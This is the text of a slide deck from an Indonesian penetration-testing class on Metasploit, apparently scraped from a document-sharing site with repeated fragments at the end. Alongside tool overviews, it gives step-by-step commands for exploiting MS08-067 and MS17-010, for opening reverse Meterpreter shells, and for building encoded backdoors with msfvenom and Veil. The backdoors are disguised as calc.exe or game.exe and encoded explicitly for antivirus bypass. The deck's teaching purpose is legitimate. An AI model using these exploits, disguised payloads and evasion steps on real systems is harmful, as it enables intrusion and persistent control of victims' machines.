Pertemuan 7 Kelas Pentest - Metasploit - Final

METASPLOIT
ANGGRAHITO, S.ST., S.T., M.B.A

OVERVIEW
• Install Metasploit
• POC
Copyright ©TAALENTA
OVERVIEW METASPLOIT
• Leader of Exploit Framework, an advanced
open-source platform for developing, testing,
and using exploit code written in ruby.
• First time was created by H. D. Moore in
2003 as a portable network tool using Perl.
The Metasploit Framework had been
completely rewritten in Ruby in 2007.
• On October 21, 2009, RAPID 7 acquired
Metasploit Project
• RAPID 7 is a security company that provides
unified vulnerability management solutions.
• Rapid 7 and security community still support
by constantly updated Metasploit with the
new exploits
OVERVIEW METASPLOIT
• METASPLOIT FRAMEWORK – Community Edition
• METASPLOIT PRO – Commercial Enterprise Edition
INSTALL METASPLOIT
Installation on Xubuntu:
Command:
sudo curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-
wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
START METASPLOIT
Command : msfconsole
ARCHITECTURE OF METASPLOIT
Don’t Start with the exploiting targets first!
Important to kindly understand the design and basic structure

of Metasploit first
Metasploit User Interfaces
• Msfconsole – Console interactive that most commonly used
• Armitage – Graphical User Interface (GUI), a third party add-on to
MSF
REX
MSF: Core
Modules
Datastore EventDispatcher ModuleManager PluginManager
Payloads
Framework Console Framework
Plugins Exploits
MSF: Base
Encoders
Config Loging Serializer Simple Sessions
Nops
MSF: UI
Aux
Console CLI WebUI GUI Armitage
Directory :
/opt/metasploit-framework/
/opt/metasploit-framework/bin/
/opt/metasploit-framework/embedded/
/opt/metasploit-framework/LICENSES
5607 directories and 36585 Files
Directory :
/opt/metasploit-framework/embedded/framework/
/opt/metasploit-framework/embedded/framework/modules
Metasploit Libraries
Some of the most important libraries are outlined below.
REX
• The basic library for most tasks
• Handles sockets, protocols, text transformations, and others
• SSL, SMB, HTTP, XOR, Base64, Unicode
MSF::CORE
• Provides the “basic” API
• Defines the Metasploit Framework
MSF::BASE
• Provides the “friendly” API
• Provides simplified APIs for use in the Framework
BASIC COMMANDS
msf6> help
BASIC COMMANDS
Database Backend Commands
Important Commands:
• db_status
• db_nmap
• workspace
• hosts
• services
BASIC COMMANDS
• msf6> workspace –h
• msf6> db_status
BASIC COMMANDS
• Services –p 21 –c name,port,proto
• Services –R 192.168.1.7
BASIC COMMANDS
Information Gathering using “db_nmap”
db_nmap –A --script *vuln* <ip address>

• Db_nmap –A --script *vuln* 192.168.1.13
AUXILIARY
auxiliary modules provide hundreds
functionality such as protocol enumeration, port scanning, fuzzing,
sniffing, etc.
msf6 > show auxiliary
AUXILIARY
Scanning smb version (Port 445)
Setting IP Target and running scanner
AUXILIARY
Port Scanner:
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 10.10.10.0/24
msf > run
DNS Enumeration
msf > use auxiliary/gather/dns_enum msf > set DOMAIN target
msf > run
FTP Server
msf > use auxiliary/server/ftp msf > set FTPROOT /tmp/ftproot msf > run
Proxy Server
msf > use auxiliary/server/socks4 msf > run
FRAMEWORK COMPONENTS
Metasploit Meterpreter :
• Run as DLL Injection Payload on a target PC providing control over the
target system
Metasploit Venom :
• Create standalone payloads as executable, Ruby Script , or Shell Code
SHELL & METERPRETER
• windows/shell/ : will give basically command prompt.
• windows/meterpreter/ : this will give meterpreter session. A

meterpreter session contains more than just a shell.
SHELL
METERPRETER
Meterpreter Commands
sysinfo Display system information backgound Move active session to background
ps List and display running processes edit (File name) Edit a file in vi editor
kill (PID) Terminate a running process shell Access shell on the target machine
getuid Display user ID migrate <PID> Switch to another process
upload or Upload / download a file idletime Display idle time of user
download screenshot Take a screenshot
pwd or lpwd Print working directory (local/remote) clearev Clear the system logs
cd or lcd Change directory (local or remote) ? Or Help Shoes all the commands
cat Display file content exit / quit; Exit the meterpreter Session
bglist Show background running scripts shutdown / Restart system
bgrun Make a script run in background reboot
bgkill Terminate a background process use Extension load
bgrun Move active session to background channel Show active channels
BIND AND REVERSE SHELL
Attacker REVERSE SHELL PC Victim
Attacker Exploit Victim’s PC/Cmachine
Listen to Reverse TCP Connection

port:4444 To 1.2.3.4:4444 IP: 5.6.7.8
IP: 1.2.3.4
Attacker BIND SHELL

PC Victim
Attacker Exploit Victim’s PC/Cmachine
Bind TCP Connection Listen to

To 5.6.7.8:4444 port:4444
IP: 1.2.3.4 IP: 5.6.7.8
EXPLOIT TARGET
• Windows Server 2000
• Windows Server 2003
WALKTROUGH
Exploit the target Walktrough Useful Command
1. Exploit : 1. Search:
use <module exploit> search <module exploit>
2. Set IP Address Target : 2. Show info

set RHOSTS <IP Address target> show info
3. Payload: 3. Show options

set PAYLOAD <module payload> show options
4. Set Listener Port: 4. Show target

set LHOST <your IP Address machine> show target
5. Running the Module” 5. Choose the fingerprint Machine Target

exploit -j set target <list number>
WINDOWS SERVER 2000
USING PAYLOAD SHELL
MODULE EXPLOIT MS08_067_NETAPI
Search <text title of module>
Module : exploit/windows/smb/ms08_067_netapi
Show options
• Need to set the RHOSTS (IP Target)

• Need to change the Payload options
(change from meterpreter to shell)
Setting RHOSTS, PAYLOAD, LPORT and exploit command
• set RHOSTS <IP target Machine>

• Set PAYLOAD windows/shell_reverse_tcp
• Set LPORT 4444 (by default is 4444, but can
be change into another)
• exploit
When session has opened, it’s mean exploit

has successed or compromise
WINDOWS SERVER 2003
USING PAYLOAD METERPRETER
MODULE EXPLOIT MS17_010_PSEXEC
Search <text title of module>
Module : exploit/windows/smb/ms17_010_psexec
Use exploit :
use exploit/windows/smb/ms17_010_psexec
Show options
set RHOSTS <IP target Machine>

• set RHOSTS 192.168.1.3
Change PAYLOAD from Shell into Meterpreter
Set Payload :
set PAYLOAD windows/meterpreter/reverse_tcp
Exploit using -j is to running as background
Sessions <number of sessions list >
METERPRETER
METERPRETER
Enter shell Windows
Exit to meterpreter
METERPRETER
sessions -l to show active sessions (there are 3 open sessions on background)
PART II
OVERVIEW
• KEY TAKEAWAYS DAY 6
• ARMITAGE
• EXPLOIT WINDOWS 2008 SERVER
• EXPLOIT METASPLOITABLE 2
• SHIKATA_GA_NAI (MSFVENOM /Client Side Attacks)
• VEIL EVASION FRAMEWORK
ARMITAGE
Armitage is a GUI front-end for the Metasploit
Framework developed by Raphael Mudge with the goal of
helping security professionals better understand hacking and
to help them realize the power of Metasploit. It was originally
made for Cyber Defense Exercises, but has since expanded its
user base to other penetration testers
Armitage is a graphical cyber attack management tool for

the Metasploit Project that visualizes targets and
recommends exploits. It is a free and open source network
security tool notable for its contributions to red
team collaboration allowing for: shared sessions, data, and
communication through a single Metasploit instance
Source: https://en.wikipedia.org/wiki/Armitage_(computing)
SETUP ARMITAGE
Install Armitage
sudo apt install -y armitage
msfupdate
Setup database.yml
cd /opt/metasploit-framework/embedded/framework/config/
sudo cp /home/pentest/.msf4/database.yml .
SETUP ARMITAGE
Edit File /home/’user’/.bashrc
MSF_DATABASE_CONFIG="/opt/metasploit framework/embedded/framework/config/database.yml"
Edit File /etc/environment
export MSF_DATABASE_CONFIG="/opt/metasploit-framework/embedded/framework/config/database.yml"
Re init Database MSFConsole
Msfdb reinit
SETUP ARMITAGE
sudo -E armitage
SET EXPLOIT RANK (1)
Setting the exploit Rank :

Set Exploit Rank à Poor*
LISTENERS (SET LHOST) (2)
Settings the Listeners HOST (LHOST):
Set LHOSTà Your Machine’s IP Address
REVERSE (WAIT FOR) (3)
Setting the Listeners Tunnel (Bind or Reverse) :
Listeners à Reverse (wait for)
ADD HOSTS (4)
ADDED 1 HOST (5)
HOSTS (NMAP SCAN) (6)
Nmap Scan à Intense Scan
HOSTS (NMAP SCAN) (7)
Nmap Scan à Intense Scan, no ping
HOSTS (SCAN COMPLETE) (8)
FIND ATTACKS (9)
FIND ATTACKS (PROCESS RUNNING) (10)
FIND ATTACKS (ATTACK ANALYSIS COMPLETE) (11)
HAIL MARY (12)
HAIL MARY (OPTIONS) (13)
HAIL MARY (PROGRESS) (14)
HAIL MARY (COMPROMISE) (15)
METERPRETER, INTERACT, METERPRETER SHELL (16)
METERPRETER SHELL (17)
Japanese Phrase Meaning
“It can’t be helped” or “nothing can be done”
MSFVENOM
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone
files and optionally encode them.
Command :
‘'-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if reverse
connection)] LPORT=[LocalPort] x86/shikata_ga_nai
Example
Reverse Meterpreter payload as an executable and redirected into a file:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 x86/shikata_ga_nai > cmd.exe
MSFVENOM
Format Options (specified with –f)
--help-formats – List available output formats exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c– Ccode
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l
encoders' to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)] LPORT=[LocalPort]
Example
Encode a payload from msfpayload 10 times using shikata- ga-nai encoder and output as executable:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 10 -e x86/shikata_ga_nai -
f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
A FEW EXAMPLE CREATING BACKDOORS
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=7777 -f exe -e

x86/shikata_ga_nai -i 10 > calc.exe
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f exe --encrypt rc4

x86/shikata_ga_nai -i 10 > a9999.exe
• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f c -b \x00\x0a\x0d

x64/shikata_ga_nai -i 10 -o ac9999.exe
• msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread

LHOST=192.168.33.134 LPORT=4567
SETUP
• sudo apt install veil-evasion

• veil -h
• Choose “s” for “silent”

• Choose “Y” for “Yes”
SETUP
• Enter password for user pentest
SETUP
• Wine installation and configuration, please wait
• Error failed message it’s okay and please continue and wait
SETUP
• Well done!, Veil installation is finish!
VEIL FRAMEWORK
• Running Veil Evaison
VEIL FRAMEWORK
• Available Payloads
Command :
use <number>
Example:
use 7
VEIL FRAMEWORK
VEIL FRAMEWORK
• Payload Options
Command :
set LHOST <your IP Address as listener>
set LPORT <your port >
And to make the file execute,

input this command:
generate
VEIL FRAMEWORK
• Fill the name and process creating the Backdoor
Input name of your backdoor payload:
Example:
(default is payload): game
Output backdoor is written in directory:

/var/lib/output/compiled/
Result:
/var/lib/veil/output/compiled/game.exe
POC (Proof of Concept)
ACCESS SIMPLE WEB SERVER :
ADDRESS:
http://<your Machine’s IP Address>:8000/
Example: http://192.168.1.13:8000/
Click “Add” button
Click “Add” button
Click “Close” button
Click “Save” button
Click “Save” button
Click “Open Folder” button
Execute the Backdoor (game.exe) file!
RUNNING LISTENER
Until you see “exploit –j” and “started Reverse TCP handler on
<your Machine’s IP Address/Listener Address>:<Port Listener>
Example :
Started Reverse TCP handler on 192.168.1.13:7777
ENTER METERPRETER
ENTER METERPRETER
THANK YOU

Pertemuan 7 Kelas Pentest - Metasploit - Final

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Pertemuan 7 Kelas Pentest - Metasploit - Final

Uploaded by

Copyright:

Available Formats

METASPLOIT

ANGGRAHITO, S.ST., S.T., M.B.A

Don’t Start with the exploiting targets first!

Important to kindly understand the design and basic structure

5607 directories and 36585 Files

db_nmap –A --script *vuln* <ip address>

msf6 > show auxiliary

Setting IP Target and running scanner

• windows/shell/ : will give basically command prompt.

• windows/meterpreter/ : this will give meterpreter session. A

Attacker Exploit Victim’s PC/Cmachine

Listen to Reverse TCP Connection

Attacker BIND SHELL

Attacker Exploit Victim’s PC/Cmachine

Bind TCP Connection Listen to

2. Set IP Address Target : 2. Show info

3. Payload: 3. Show options

4. Set Listener Port: 4. Show target

5. Running the Module” 5. Choose the fingerprint Machine Target

• Need to set the RHOSTS (IP Target)

• set RHOSTS <IP target Machine>

When session has opened, it’s mean exploit

set RHOSTS <IP target Machine>

Sessions <number of sessions list >

sessions -l to show active sessions (there are 3 open sessions on background)

Armitage is a graphical cyber attack management tool for

sudo apt install -y armitage

Edit File /home/’user’/.bashrc

Edit File /etc/environment

Re init Database MSFConsole

Setting the exploit Rank :

“It can’t be helped” or “nothing can be done”

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=7777 -f exe -e

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f exe --encrypt rc4

• msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=9999 -f c -b \x00\x0a\x0d

• msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread

• sudo apt install veil-evasion

• Choose “s” for “silent”

• Enter password for user pentest

And to make the file execute,

Output backdoor is written in directory:

ACCESS SIMPLE WEB SERVER :

http://<your Machine’s IP Address>:8000/

Click “Add” button

Click “Add” button

Click “Close” button

Click “Save” button

Click “Save” button

Click “Open Folder” button

Execute the Backdoor (game.exe) file!

You might also like

db_nmap –A --script vuln <ip address>